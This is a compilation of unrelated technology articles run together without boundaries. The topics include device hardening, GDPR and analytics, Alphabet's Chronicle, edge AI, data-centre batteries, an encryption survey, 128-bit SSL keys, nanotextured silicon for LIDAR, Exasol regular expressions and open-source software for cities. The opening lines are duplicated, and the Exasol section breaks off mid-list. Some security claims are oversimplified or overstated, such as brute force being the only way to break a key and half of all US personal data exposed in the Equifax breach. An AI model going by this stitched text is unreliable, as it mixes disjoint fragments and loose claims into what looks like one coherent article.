By now, you should have a good idea of what it means to harden a device. Before we end this article, though, let's go through a quick recap. Hardening a device is the act of making it more secure than someone else's.
By now, you should have a good idea of what it means to harden a device. Before we end this article, though, let's go through a quick recap.

There is no such thing as perfect security, so your job as a cybersecurity professional is to make your IT infrastructure harder to break into than someone else's; hardening a device means exactly that. There are multiple ways of hardening devices, and one of the first steps is developing a security baseline: a checklist of tasks you can perform to meet a minimum security standard. As new exploits are discovered in the wild, that security baseline should be updated and devices should be audited against it. Mobile devices require extra attention simply because they are mobile; once a device is outside the grasp of an IT administrator, threat actors have plenty of ways of stealing its data. The best way to prevent data theft from mobile devices is to encrypt them.
Since the commencement of GDPR, companies across the world – and not just in the EU – have been under immense pressure to comply with the new regulations. Given that GDPR is one of the most far-reaching data protection laws ever created, its impact on businesses is apparent – especially for those working in big data and analytics.

GDPR imposes several restrictions on how companies collect, store, process, manage and analyse data, governing every aspect of data use – from storage to portability, accessibility to consent. It also places control over the ownership of personal data back into the hands of users, thereby getting rid of the gray area that previously existed.

So, how does GDPR impact big data and analytics in general? And what can you do to enable and ensure compliance? Let's find out!

What impact does GDPR have on analytics?

The General Data Protection Regulation (GDPR) looks to give end-users more control over how their personal data is collected and used. While the regulation was intended to safeguard the privacy of citizens of the European Union, today it has become a worldwide norm, compelling enterprises everywhere to abide by its framework.

Although GDPR has its bearings on every industry, its impact on data science is particularly massive. It imposes limits on how businesses profile customers and process personal data, compelling them to take several measures across data collection, user consent, data storage, usage, retention, and disposal. In a nutshell, with the implementation of GDPR, every organisation that uses analytics has to:

- Be more transparent about what information they're collecting, how they're collecting it, what it will be used for, and who it will be shared with.
- Take consent from users to allow the collection of information and give them the right to see what information is being stored and used.
- Explicitly state how the collected information will be used, through specific, informed, and unambiguous disclosures to consumers.
- Remove information from their systems, as well as from every other organisation or system they've shared the information with, where consent is not given.
- Provide proof of the steps they're taking to comply with the new regulation and of how user information is being protected.
- Notify users of a data breach within 72 hours and ensure compliance, or face fines as high as €20 million or 4% of the company's annual global revenue – whichever is greater.

How can you drive compliance?

If you use any kind of data analytics – which you must be, given the digital era – you are collecting data about your business, processes, employees, customers, markets, competition, and more. In that case, you have no choice but to take steps to comply with GDPR standards. From obtaining user consent before collecting their information to deciding how long you can store user data before having it deleted automatically, there's a lot you need to do to enable and drive compliance. Here are some tips:

- Enable access control: To make sure your analytics systems are compliant with GDPR, a good place to start is by making sure data is only made available to authorised people. Having the right access control mechanisms in place is a great way to safeguard personal data. You should also have controls in place that keep a record of all data access – making it easier for you to trace instances of unauthorised access.
- Anonymise data: Data anonymisation is a great way to ensure the privacy and protection of user information. To work towards GDPR compliance, you can either take the encryption route or remove personally identifiable information from your data sets, so the people whose data you're using remain anonymous (see the sketch at the end of this article).
- Embrace privacy by design: One of the biggest steps analytics teams will have to take to ensure GDPR compliance is to embrace privacy by design. From how your analytics strategy is developed to how your algorithms, systems, and stacks are built, you need to integrate privacy and security into every element of your analytics framework from the very beginning. You also need to audit the data you collect regularly, limit its exposure, and document the information you collect, store, and process.
- Disable automatic personal data tracking: With users spending so much time online, it is natural for companies to track their online activities for analytics purposes. However, for GDPR compliance, you might have to disable personal data tracking and have mechanisms in place to mask IP addresses, user IDs, and any other information that helps identify specific users.
- Integrate consent boxes: Personal user data is a treasure trove of information for the modern business. If you want to continue tracking personal data, you'll first need to get user consent. Integrating consent boxes with your website or mobile application is a great way to get the data you need while staying compliant with GDPR.
- Revisit your data retention policies: Since the inception of analytics, companies have been collecting and storing user data in massive data warehouses and, now, in the cloud. However, with GDPR in effect, you can no longer store user data forever; you can keep it only as long as you need it for data processing, after which it has to be deleted. This not only ensures the secure disposal of personal data, but also reduces the risk of using inaccurate, out-of-date, or irrelevant data for analysis.

Use GDPR as an opportunity

For the analytics world, data is the lifeblood that ensures the accuracy and relevance of results. With the arrival of GDPR, it might seem like the available pool of data for analytics has shrunk, but that's not entirely true. The controls that GDPR brings with it aim not only to safeguard user privacy but also to ensure that the data analytics companies use is up to date, relevant, and accurate.

Love it or hate it – there's no escape from GDPR. At the end of the day, the only thing you can do is put controls in place to comply with GDPR and gain the trust of your customers.
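As a concrete illustration of the anonymisation tip above, here is a minimal pseudonymisation sketch in Python. One caveat worth stating plainly: under GDPR, keyed pseudonymisation is weaker than true anonymisation, and pseudonymised data may still count as personal data, so treat this as a risk-reduction technique rather than a compliance guarantee. The key name and record fields are hypothetical.

```python
import hashlib
import hmac
import os

# The secret key must live outside the analytics data store; this
# environment variable name is just a placeholder.
SECRET = os.environ.get("PSEUDONYMISATION_KEY", "change-me").encode()

def pseudonymise(identifier: str) -> str:
    """Replace a direct identifier with a stable, keyed hash."""
    return hmac.new(SECRET, identifier.encode(), hashlib.sha256).hexdigest()

event = {
    "user": pseudonymise("alice@example.com"),  # no raw email in the dataset
    "page": "/pricing",
    "dwell_ms": 5400,
}
print(event)
```

Because the hash is stable, analysts can still count unique users and follow sessions, while the raw identifier never enters the analytics pipeline.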
Everyone wants data – especially the people who shouldn't have it. Those of us who watch the big data industry closely know how much damage cyberattacks can cause to companies large and small. When half of the United States' personal information was compromised in the 2017 Equifax breach, every single American had to consider the possibility that they could be a victim of identity theft. Data breaches are not only a serious threat to businesses and consumers, they're costly; each breach in the United States costs an average of $7.3 million. Cybercrime is getting more sophisticated and more common, because data is one of the most valuable assets organizations hold digitally.

So, how can we hold back the tide of cybercrime and data theft? Cybersecurity has advanced, but it's struggling to keep up with hackers' new techniques. Now, one of the biggest players in the data game is leveraging its power with a new cybersecurity company. Alphabet, Google's parent company, recently announced the launch of Chronicle, a dedicated cybersecurity company. The details are still somewhat hazy, but from what we know, it has the potential to revolutionize cybersecurity as we know it. Below are five key pieces of information about Chronicle that you should know.

1. It will make sense of massive amounts of cybersecurity data.

One of the most pressing challenges in the big data space is making sense of all the data coming in. The majority of it isn't even used, leaving money on the table. For example, by some estimates, using big data effectively in the US healthcare system could create $300 billion in value. Unused data isn't just a missed opportunity, however – it's a vulnerability. The volume can get overwhelming and confusing, allowing security threats to fly under the radar. Thousands of security alerts can pop up every day in large enterprises, and security teams can't possibly stay on top of them all. Chronicle helps teams make sense of all this data, and reduces the manual monitoring companies have to do.

2. It will use machine learning to find patterns and anomalies.

Chronicle's systems make use of advances in artificial intelligence and machine learning to address these vulnerabilities. Machine learning uses these massive, unstructured datasets to spot patterns humans can't find, and to work out what's actually a threat – and what's normal. Because cybercriminals are always refining their tactics, it's hard for traditional cybersecurity systems to keep up. A learning system like Chronicle could be the answer to spotting new types of malware and halting the evolving tactics used by cybercriminals.

3. It will help find solutions for large institutions and key industries.

Both large and small companies are at risk of data breaches, but large companies and key industries are often major targets for attacks due to the sheer amount of valuable data they store. Healthcare organizations, for instance, are common targets. About 90% of healthcare organizations now use at least a basic form of EHRs (electronic health records), and healthcare data is some of the most sensitive data in existence. It's crucial that we do a better job of protecting this information, to keep people safe and improve the care these institutions can offer. Chronicle's focus is on large institutions like Fortune 500 companies, and the company is working to ensure the scalability of its systems to protect key institutions.

4. It will streamline cybersecurity solutions to reduce vulnerability.
Security teams aren’t going to be eliminated with machine learning and artificial intelligence anytime soon, and that is not Chronicle’s aim. The goal is to make security teams more effective and streamline their operations. Using one system simplifies the process and allows teams to work where they’re most effective. Chronicle’s CEO, Stephen Gillett, says, “We want to 10x the speed and impact of security teams’ work by making it much easier, faster and more cost-effective for them to capture and analyze security signals that have previously been too difficult and expensive to find.” 5. It will allow for faster reactions. In a perfect world, we’d be able to stop all cyberattacks before they happened. Unfortunately, we live in the real world, and like all crime, it’s impossible to prevent all cyberattacks. Breaches are going to happen, and the best we can do is to minimize their impact. Chronicle hopes to accomplish this by allowing companies to spot problems quickly and start taking action, controlling the damage and reducing the cost of a breach. Currently, some breaches aren’t discovered for months, and many go unreported. Chronicle’s machine-learning system should be more efficient at spotting threats as they occur than current systems, potentially spotting anomalies within minutes, or even seconds. 2018 will be a pivotal year for slowing the amount of cybercrime and getting a handle on hackers. Keep your eyes peeled for more about Chronicle’s upcoming endeavors in cybersecurity. Like this article? Subscribe to our weekly newsletter to never miss out!
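For the technically curious: Chronicle has not published how its detection actually works, but the anomaly-spotting idea in point 2 can be illustrated with a toy sketch. This assumes scikit-learn and NumPy, and the "telemetry" below is fabricated for demonstration.

```python
# Toy anomaly detection on made-up security telemetry; not Chronicle's
# (unpublished) technology. Requires numpy and scikit-learn.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)
# Columns: logins per hour, failed logins per hour (fabricated baseline).
normal = rng.normal(loc=[40, 2], scale=[5, 1], size=(500, 2))
spikes = np.array([[40, 30], [400, 2]])   # brute-force attempt, login flood
events = np.vstack([normal, spikes])

model = IsolationForest(contamination=0.01, random_state=0).fit(events)
flags = model.predict(events)             # -1 marks suspected anomalies
print(events[flags == -1])
```

The point of the illustration is the workflow, not the model: learn what "normal" looks like from volume, then surface the handful of events that don't fit, instead of asking analysts to read thousands of alerts by hand.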
AI Data Processing at the Edge Reduces Costs, Data Latency

A race is on to accelerate artificial intelligence (AI) at the edge of the network and reduce the need to transmit huge amounts of data to the cloud. The edge, or edge computing, brings data processing resources closer to the data and devices that need them, reducing data latency – which matters for many time-sensitive processes, such as video streaming or self-driving cars. The development of specialized silicon and enhanced machine learning (ML) models is expected to drive greater automation and autonomy at the edge for new offerings, from industrial robots to self-driving vehicles.

Vast computing resources in centralized clouds and enterprise data centers are adept at processing large volumes of data to spot patterns and create machine learning training models that "teach" devices to infer what actions to take when they detect similar patterns. But when those models detect something out of the ordinary, they are forced to seek intervention from human operators or get revised models from data-crunching systems. That's not sufficient in cases where decisions must be made instantaneously, such as shutting down a machine that is about to fail.

"A self-driving car doesn't have time to send images to the cloud for processing once it detects an object in the road, nor do medical applications that evaluate critically ill patients have leeway when interpreting brain scans after a hemorrhage," McKinsey & Co. analysts wrote in a report on AI opportunities for semiconductors. "And that makes the edge, or in-device computing, the best choice for inference."

That's where AI data processing at the edge is gathering steam.

Overcoming Budget and Bandwidth Limits

As the number of edge devices increases exponentially, sending high volumes of data to the cloud could quickly overwhelm budgets and broadband capacity. That issue can be overcome with deep learning (DL), a subset of ML that uses neural networks to mimic the reasoning processes of the human brain, allowing a device to self-learn from unstructured and unlabeled data. With DL-embedded edge devices, organizations can reduce the amount of data that needs to be sent to data centers. Similarly, specialized ML-embedded chips can be taught to discard raw data that doesn't require any action – for example, uploading video to the cloud only when it meets certain criteria, such as containing a human figure, while discarding frames of birds and dogs (a pattern sketched in code below).

"There isn't enough bandwidth in the world to just collect data and send it to the cloud," said Richard Wawrzyniak, a senior market analyst with Semico Research Corp. "AI has advanced to the point that data crunching resides in the device and then sends whatever data points are relevant to somewhere to be processed."

Deciding What Is Near and Dear

Organizations face the challenge of developing architectures that differentiate between data that can be processed at the edge and data that should be sent upstream. "We are seeing two dimensions," explained Sreenivasa Chakravarti, vice president of the manufacturing business group at Tata Consultancy Services (TCS). "Most organizations are trying to segregate the data and talking about how to keep what is nearest to you at the edge and what to park in the cloud." This requires having a cloud-to-edge data strategy.
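Here is the minimal sketch promised above of the edge-filtering pattern. The detector and uploader are hypothetical stand-ins (a real deployment would use an on-device vision model and a cloud client), but the control flow is the point: infer locally, transmit selectively.

```python
from typing import Callable, Iterable

def load_person_detector() -> Callable[[str], bool]:
    # Placeholder for a real on-device DL model (e.g., a compiled vision net).
    return lambda frame: "person" in frame

def upload_to_cloud(frame: str) -> None:
    # Placeholder for a real uploader; here we just log the decision.
    print("sent to cloud:", frame)

def filter_at_edge(frames: Iterable[str]) -> None:
    detect = load_person_detector()
    for frame in frames:
        if detect(frame):           # only frames that matter leave the device
            upload_to_cloud(frame)
        # everything else is discarded locally, saving bandwidth

filter_at_edge(["bird on wire", "person crossing", "dog", "person waiting"])
```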
Chakravarti said he expects autonomous edge capabilities to be used in more production lines, not just in self-driving vehicles. The challenge is in synchronizing autonomous activity in a larger ecosystem, he said, as manufacturers want to increase the throughput of their operations, not just of individual systems.

Similarly, many autonomous systems must incorporate some type of human interface. "Before the automotive industry is ready to let AI take the wheel, it first wants to put it in currently produced cars with lots of driver-assist technology," wrote ARC Advisory Group senior analyst Dick Slansky. "AI lends itself very well to powering advanced safety features for connected vehicles. The driver-assist functions embedded into the vehicles coming off production lines today are helping drivers become comfortable with AI before the vehicles become completely autonomous."

The Future of AI Data Processing at the Edge

Almost every edge device shipping by 2025, from industrial PCs to mobile phones and drones, will have some type of AI processing, predicted Aditya Kaul, research director with market research firm Omdia|Tractica. "There is a host of other categories where we haven't seen activity or visibility yet, because original equipment manufacturers haven't moved that fast across all traditional areas and need to understand the value of AI at the edge. That will be the second wave in 2025 to 2030," Kaul predicted.

Chip manufacturers are engaged in a heated arms race to market AI acceleration modules for edge devices. Established companies such as microprocessor titan Intel and graphics processor leader NVIDIA face challenges from new competitors, such as the well-funded tech giants Google, Microsoft, and Amazon, and emerging companies such as Blaize and Hailo Technologies. Some 30 companies were engaged in developing AI acceleration chip technology for edge applications at the beginning of the year, likely heading toward cutthroat competition. "I wouldn't want to be one of those companies," said Simon Crosby, Chief Technology Officer at Swim, a developer of software for processing streaming data. "In the edge world, ultimately acceleration parts have to be used in a vertically integrated solution by somebody who is going to take a hardware-based solution to market. Customers don't care about the innards."

Jumping Into AI at the Edge

Technology for AI applications at the edge is advancing so quickly that many organizations may be hesitant to invest in a particular technology for fear that it will quickly be leapfrogged by more advanced capabilities. TCS's Chakravarti said he advises companies not to wait until they think the technology has matured but instead to start building organizational competency now. "You either wait for maturity to come and be left behind or make early investments and grow along with the technology," Chakravarti said. However, he advised, "don't take technology and hunt for problems. Focus on your problems and hunt for the technology to solve them."
BATTERY MONITORING AND ENERGY MANAGEMENT

The data center industry is booming as a result of the dramatic increase in cloud computing, bringing new challenges and opportunities. Data centers are important energy consumers, but as in many other cases, the importance of quality prevails over quantity. To achieve a high tier classification, data centers need redundant power supplies and a reliable backup power source, which normally includes UPSs. UPSs use batteries, and the numbers are impressive: a data center may easily need well over 10,000 batteries. How do you monitor, manage and maintain those batteries? How can we predict failure, and how can we increase battery life and reduce cost? Should we use traditional or Li-ion batteries? Why should monitoring systems be part of an EMS (energy management system), and how can artificial intelligence, demand modelling and green power sources help to reduce operating cost and improve reliability?
Many of us take planes, trains and automobiles. We don't have to be hydraulic specialists, railroad engineers or car mechanics to use these modes of transportation. But it doesn't hurt to know how to navigate an airport, read a train schedule or understand the rules of the road. Of course, today our journeys aren't always in the physical world. When we want to go somewhere or do something, we often do it online. Understanding how to navigate and stay safe in the virtual world is critical. In the physical world, we protect ourselves with safety methods – for example, by buckling our seatbelts and standardizing airbags. In the digital world, we need to safeguard our data, devices and privacy from vulnerabilities.

You don't need me to tell you the importance of cybersecurity. Data breaches, ransomware and other online security events are in the news almost daily. That is why encryption is one of the strongest and most effective ways to protect critical data. But encryption is a fairly new concept to many individuals and organizations. We wanted to understand just how much Americans understand about encryption, so we fielded a survey of 1,000 U.S. adults to find out. Here's a snapshot of what we discovered.

Most Americans correctly identified the definition of encryption

More than 72% of the survey group was able to select the right definition of encryption: that encryption "means making data unreadable to anyone other than those holding the encryption key." The rest of the group either selected one of the two wrong answers or said they had no idea what the correct answer was.

Even more said that encryption – in general and related to the cloud – is important

Additionally, more than 87% of the survey group said that encryption is important, and more than half said they understand that their private data is safe in the cloud if it is encrypted. That is encouraging, especially given the expanding threat landscape. As more applications and endpoints go online, cybersecurity becomes an even greater challenge. Just look at where things are going: Gartner expects the public cloud services market to grow to $266.4 billion by the end of this year, Forrester thinks the public cloud market will grow to $411 billion by 2022, and 451 Research says nearly 14 billion IoT devices could be online by 2024.

But many appeared uncertain about who can and should encrypt what, and how it works

Only a little more than half the survey group (53.3%) understand that individual consumers can encrypt their own personal data. Nearly a third (32%) said they didn't know whether consumers can do so, and 14.7% incorrectly answered that individuals cannot encrypt their own personal data. That suggests that businesses and government must work to educate consumers about encryption. The upside is that some already are doing that. For example, Entrust, an Entrust Datacard company, has sponsored this survey, and we regularly write and speak about encryption. In addition, the U.S. Federal Trade Commission advises members of the public to use encryption to keep their personal information secure.

When asked why people and companies encrypt data, however, fewer than half of our survey group answered correctly. Slightly more than 47% rightly said that individuals and organizations use encryption to keep data secure until it's decrypted. Even fewer were able to correctly identify cryptographic keys when presented with a series of answers.
Just 45.9% correctly identified cryptographic keys as a series of codes needed to unlock encryption.

Nonetheless, most understand the case for using encryption to protect their finances

More than half of the survey group indicated that they understand that encryption can be used to secure online banking (55.7%) and financial information (52.6%). Forty-six percent said it can be used to secure mobile payments, and more than 42% said it can safeguard mobile wallets. That is encouraging, since financial gain is the most common driver of data breaches; the 2019 Verizon Data Breach Investigations Report said 71% of breaches are financially motivated. That explains why financial institutions encourage their customers to use encryption. This Bank of America FAQ page is one example: it talks about how encryption works to secure online banking, financial information and mobile payments.

Consumers apparently want their financial services companies to use encryption, too. More than half (54.9%) of the survey group said they place the highest trust in the financial services sector to encrypt their data. The healthcare industry (38.7%), the technology vertical (36.1%) and the public sector (30%) ranked next on the "most trusted to encrypt your data" list.

Still, plenty of confusion exists, and many people would like more certainty

However, there appears to be a fair share of confusion as to which applications encryption can secure – and there are lots of them, including blockchain, cloud, digital payments and IoT. Nearly 40% of Americans misunderstand what encryption is. Survey results suggest this group thinks either that encryption means you have to enter a password before you can unlock data, or that it occurs when you've installed an antivirus system on your computer.

Yet, as more breaches occur and more connected endpoints join the fray, more people are becoming aware of the need to use encryption to secure their data and devices – and they want more certainty about encryption and cybersecurity. A proof point of that need: 74.3% of survey participants said they would feel very or somewhat safe that their private information was secure if they knew it was given a formal seal of encryption, and 47.9% said they would trust a company that used a formal seal of encryption. Such certification could be in our collective future. And proven encryption solutions exist today. People and organizations wanting to protect their enterprise infrastructure, network communications and sensitive data against threats should get on board with encryption today.
There are two possible reasons why you're reading this post right now. The first is that you're exploring SSL certificate options, and you stumbled across the term "128 bit SSL encryption." The second is that you came across the term on an ecommerce site or somewhere else, and sheer curiosity led you here. In either case, by the end you'll have a good idea of what 128 bit SSL encryption means.

An SSL certificate protects your privacy by encrypting the data between a client (usually a web browser) and a web server. Thus, it prevents an ill-intended third party from stealing or tampering with the data in transit. Such security is necessary to protect users' sensitive data such as credit card information, passwords, personal messages, etc. But how does it work? Let's break the process down into two basic steps:

When you visit a website through your web browser, the browser checks whether an SSL certificate is installed. If one is found, both parties begin the communication process known as the SSL/TLS handshake. Once contact is established, the web browser validates the authenticity of the SSL/TLS certificate installed on the web server.

This communication between client and server uses a cryptographic technique called asymmetric encryption, also known as public key encryption. This encryption method involves two keys for the encryption and decryption of the data. The public and private keys are different, yet mathematically related to each other. The public key, as the name suggests, is public and is used by the client to encrypt information. The private key, on the other hand, is kept by the server and is used to decrypt data.

Asymmetric encryption, through the use of the two keys, provides a unique way to validate the identities of both parties. But although this method is a more secure way of protecting information, it takes significantly more time to encrypt and decrypt data than the other encryption method we'll talk about momentarily. Relying on it for everything would ultimately result in slower communication, irrespective of internet speed. In other words, it's not practical to use asymmetric encryption for every bit of information – yet we still need it to validate both parties. So, what's the answer?

The solution comes in the form of a session key – a third key, generated by both parties (server and client) and used to encrypt data for the rest of the session. This is called symmetric encryption. The session key is usually 128 or 256 bits long – exactly the number you're curious about, since you're still here and reading this article.
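To make the idea concrete, here is a minimal sketch of symmetric encryption with a 128-bit key, using Python's third-party cryptography package. The library choice is ours for illustration – real TLS stacks use their own vetted implementations – and the plaintext is made up.

```python
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM  # pip install cryptography

key = AESGCM.generate_key(bit_length=128)  # a random 128-bit session key
cipher = AESGCM(key)
nonce = os.urandom(12)                     # never reuse a nonce with the same key

ciphertext = cipher.encrypt(nonce, b"card number 4111 1111 1111 1111", None)
plaintext = cipher.decrypt(nonce, ciphertext, None)
assert plaintext == b"card number 4111 1111 1111 1111"
```

Both sides of a TLS session hold the same key, so either can encrypt and decrypt quickly – which is exactly why the slower asymmetric step is used only once, to agree on this key.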
128 bit refers to the length of the symmetric encryption key (session key) that is used for encryption. The longer the key, the harder it is for a hacker to crack, because there's only one way to break it – trial and error (a brute-force attack, if you want to be technical). So, if an SSL connection uses a symmetric key 128 bits long, there are 2^128 possible combinations – which is a HUGE number! To crack the key, one must try most of these combinations.

Here are a few estimates of how long it would take to crack keys of various lengths:

| Key Size | Time to Crack       |
|----------|---------------------|
| 128-bit  | 1.02 x 10^18 years  |
| 192-bit  | 1.872 x 10^37 years |
| 256-bit  | 3.31 x 10^56 years  |

Yes, with the computational capabilities of existing technologies, it's impossible to crack a 128 bit key within any measurable timeframe. Even the fastest supercomputers in the world can't do anything about it. So, your data is in safe hands.

As you can see in the table above, it's harder to crack longer keys. However, don't automatically assume that because you're using a 128-bit key, your encryption strength is 128 bits. You could, right now, be using 40-bit encryption with 128-bit SSL. That's possible if you haven't configured your web server for 128-bit SSL encryption. The capabilities of your server and browser play a major role in determining the encryption strength. So, to implement 128-bit SSL encryption, you must first configure your web server accordingly. Otherwise, you won't achieve the full encryption strength your certificate is capable of.

The higher the key length, the harder it is to crack – this is the general rule of thumb to remember. These days, most certificate authorities that issue SSL certificates have migrated from 128-bit to 256-bit keys as a standard for better security. However, cracking either of them is an impossible task until quantum computers come knocking. Until then, it's all good.

Get Comodo SSL certificates starting for as little as $7.27 per year!
When a team of engineers went to work in 2015 looking for a new technique to boost the cost-effectiveness of solar cells, they didn't realize they'd end up with a bonus – a way to help improve the collision avoidance systems of self-driving cars. The twin discoveries started, they say, when they began looking for a solution to a well-known problem in the world of solar cells.

Solar cells capture photons from sunlight in order to convert them into electricity. The thicker the layer of silicon in the cell, the more light it can absorb, and the more electricity it can ultimately produce. But the sheer expense of silicon has become a barrier to solar cost-effectiveness. So the Stanford engineers figured out how to create a very thin layer of silicon that could absorb as many photons as a much thicker layer of the costly material. Specifically, rather than laying the silicon flat, they nanotextured its surface in a way that created more opportunities for light particles to be absorbed. Their technique increased photon absorption rates in the nanotextured solar cells compared to traditional thin silicon cells, making more cost-effective use of the material.

Then came the surprise. After the researchers shared these efficiency figures, engineers working on autonomous vehicles began asking whether this texturing technique could help them get more accurate results from a collision-avoidance technology called LIDAR, which is conceptually like sonar except that it uses light rather than sound waves to detect objects in the car's travel path. LIDAR works by sending out laser pulses and calculating the time it takes for the photons to bounce back.

The autonomous car engineers understood that current photon detectors use thick layers of silicon to make sure they capture enough photons to accurately map the terrain ahead. They wondered if texturing a thin layer of silicon, much like on the solar cells, would lead to more accurate maps than current thin silicon allows. Indeed, in their new paper, the Stanford engineers report that their textured silicon can capture as many as three to six times more of the returning photons than today's LIDAR receivers. They believe this will enable self-driving car engineers to design high-performance, next-generation LIDAR systems that would continuously send out a single laser pulse in all directions. The reflected photons would be captured by an array of textured silicon detectors, creating moment-to-moment maps of pedestrian-filled city crosswalks.

Harris said the texturing technology could also help to solve two other LIDAR snags unique to self-driving cars – potential distortions caused by heat, and the machine equivalent of peripheral vision. The heat problem occurs because the LIDAR laser apparatus can heat up during extended use, causing photon wavelengths to shift slightly. Such shifts could cause light particles to bounce off traditional silicon that is made to absorb specific wavelengths. But the Stanford nanotexturing technology can absorb photons across a broad spectrum, eliminating this heat-shift issue. With respect to the machine equivalent of peripheral vision, Harris and Zang believe it may be possible to make a flexible version of their nanotextured silicon receptor. Flexibility would allow them to curve the receptor.
Between that and the light-trapping advantage of their nanotextured surface, they think it may be possible for LIDAR systems to enlarge the angle of acceptance for photons, in order to more completely identify all potential obstacles. Harris said he always thought Zang’s texturing technique was a good way to improve solar cells. “But the huge ramp up in autonomous vehicles and LIDAR suddenly made this 100 times more important,” he says.
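As an aside, the time-of-flight principle behind LIDAR described above is simple arithmetic: a pulse's round-trip time, multiplied by the speed of light and halved, gives the distance to the reflector. A toy sketch (the 200 ns echo is an invented example):

```python
SPEED_OF_LIGHT = 299_792_458  # metres per second, in vacuum

def lidar_distance(round_trip_seconds: float) -> float:
    """Distance to the object: the pulse travels out and back, so halve it."""
    return SPEED_OF_LIGHT * round_trip_seconds / 2

print(f"{lidar_distance(200e-9):.1f} m")  # a 200 ns echo is roughly 30 m away
```

Capturing three to six times more returning photons, as the textured detectors do, means more of these echoes register reliably, which is what tightens the resulting map.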
Regular expressions can be used to filter or replace strings with certain patterns. Exasol supports the Perl Compatible Regular Expressions (PCRE) dialect, which has a powerful syntax and exceeds the functionality of dialects like POSIX Basic Regular Expressions (POSIX BRE) or POSIX Extended Regular Expressions (POSIX ERE). This chapter describes the basic functionality of regular expressions in Exasol. Detailed information about the PCRE dialect can be found on www.pcre.org. Regular expressions can be used in the following functions and predicates:
Our world is changing. Transformations in mobility patterns, pressing air quality issues, and growing flood risks present new challenges for European cities. Now, however, thanks to digitization and data, cities can tackle these challenges together. Rather than reinventing the wheel or going down the traditional software vendor route with all its associated issues, cities can improve local services by co-developing and replicating digital solutions based on open-source software.

Improving Public Service Delivery with Data-Driven Solutions

When the Covid-19 pandemic ripped through Europe last spring, governments had to act fast. With populations confined to their homes, digital solutions were the obvious way forward. But as hospitals started filling up, there was little time for lengthy procurement processes or expensive software development. For Belgium, battling one of the worst Covid-19 rates in Europe, the answer lay in open-source software. By basing its Covid-19 tracing app Coronalert on Germany's open-source Corona Warn App, Belgium could develop its own app in just six weeks for under €1 million, a fraction of the €20 million Germany originally spent. Instead of starting from scratch, the development team reused 85% of the German code, adapting the rest to Belgium's unique needs.

In addition to reduced costs and rapid development, choosing open source let Belgium prioritize data transparency. The pandemic has been paralleled by a similarly unstoppable spread of misinformation and distrust. For some citizens, relinquishing deeply personal health and location data to a private vendor would be a step too far. By staying in control of the code, Belgium remained in control of citizen data. The app was based on the open-source DP-3T protocol, which doesn't share personal data, and Belgium chose to collect the absolute minimum of personal information. In an area this sensitive, transparency and trust can be the difference between an effective tracing system and a public health disaster.

Take Back Control with Open-Source Software Solutions

While the pandemic has created a clear case for selecting fast, low-cost, collaborative solutions, open-source software isn't useful solely in times of crisis. Open source refers to something people can modify and share because its design is publicly accessible – so open-source software has code anyone can inspect, modify, enhance and share. Most people will have encountered the open-source movement at some point in their personal lives – think VLC, OpenOffice, or even Mozilla Firefox. But the benefits extend to public service delivery too.

Increasingly, it is software that runs society. From traffic management to accounting systems, flood monitoring to maintenance services, in the modern smart city software could even be considered public infrastructure. However, the code that keeps the city moving is frequently hidden in proprietary systems without democratic accountability. By selecting proprietary software solutions from vendors, cities run a risk, becoming dependent on the vendor for vital services. Not only do they lock themselves into a system that produces data for private ownership rather than the public good, but the commercial nature of software vendors also leaves cities vulnerable to changes in future terms, licensing policies or pricing – or even to the eventual dissolution of the company.
A small but growing number of public authorities are beginning to look to open-source software for a more efficient, democratic, and secure way to run smart, data-driven public services. By selecting open source, cities can diffuse risk and stay in control of the software they use. Open-source software is transparent and provides insight that serves the public interest. It offers cities independence, flexibility, and financial savings. Vendors can be slow to upgrade and inflexible, whereas cities that know their own code can adapt it to changing needs. And, fundamentally, by opening up software development to new networks and increasing the number of people testing and working on the code, cities can co-develop solutions that wouldn't be possible individually. For both cities sharing their open-source code and cities replicating existing open-source solutions, the result is more innovative public services that meet a broader range of needs.

Digital mapping developments illustrate how open-source software can accelerate better public service delivery. Geo-data fuels the modern smart city – how could intelligent traffic control or efficient waste collection be implemented without digital geographic information? The Agency of Geoinformation and Surveying in Hamburg developed the modular, open-source Masterportal software solution to facilitate geospatial information applications. It has since been replicated in many German cities for diverse public service uses such as waste management and disaster protection. In Munich, for example, the location and status of mobile recycling stations are updated daily, and the fire service uses geo-data to identify affected streets, plot an unobstructed evacuation route, and locate the nearest hospital.

Geo-data can help tackle the issues facing every modern city – and, as Hamburg built its open-source software with replicability in mind, any city can have a Masterportal at little cost. During a workshop, Bradford and Ghent even created their own test Masterportals, featuring some of the services unique to their communities, in a mere two hours. Building a proof of concept in such a short time opens up possibilities for cities looking to explore innovative ways to deal with their shared challenges. Unfortunately, neither Bradford nor Ghent found practical use-cases for their Masterportals – illustrating the importance of laying the groundwork to ensure success with this relatively new way of approaching public services.

The Path to Successful Replication

In theory, building open-source software makes it possible to share digital public service solutions with other cities or departments, saving time and resources. In practice, successful software replication requires preparation. As a new and innovative approach to public service delivery, adopting open-source software requires overcoming several barriers. Foremost among these is resistance to change, as open source often requires cities to adopt new approaches, from redesigning their digital architecture to rethinking organizational processes. Often, business as usual is too easy, and navigating the political risk, regulatory bottlenecks, and vested interests in the status quo can prove challenging. For success, it's also essential to select the right solution – or the right components of a solution. This means finding financing models, assessing political support, and engaging stakeholders, including users, to ensure sufficient interest and build confidence.
To pave the way for success when co-developing and replicating software, cities should create a replication plan. This entails mapping what lies ahead, staying on top of legal and technical requirements, and setting up plenty of opportunities for collaboration. For cities building replicable software, it helps to have a replication mindset right from the start. Open-source solutions that are clearly documented and thoroughly explained are much easier to replicate, whether that means implementing an exact copy of the solution under new conditions or (as is more often the case) replicating certain components in a new context. The code needs to be high quality and the repository accessible to foster applicability, and it must carry the right kind of open-source license. Other cities also need to be able to find the solution – either online or through their networks – and for international audiences, it helps to have thorough English documentation and demonstrations.

If cities take these steps, they can reap the rewards of collaborative development. If others replicate your solution, they will also rely on it, scrutinizing it, fixing bugs, and pointing out limitations. Over time, a community of developers working together will result in stronger code and better solutions for 21st-century challenges.

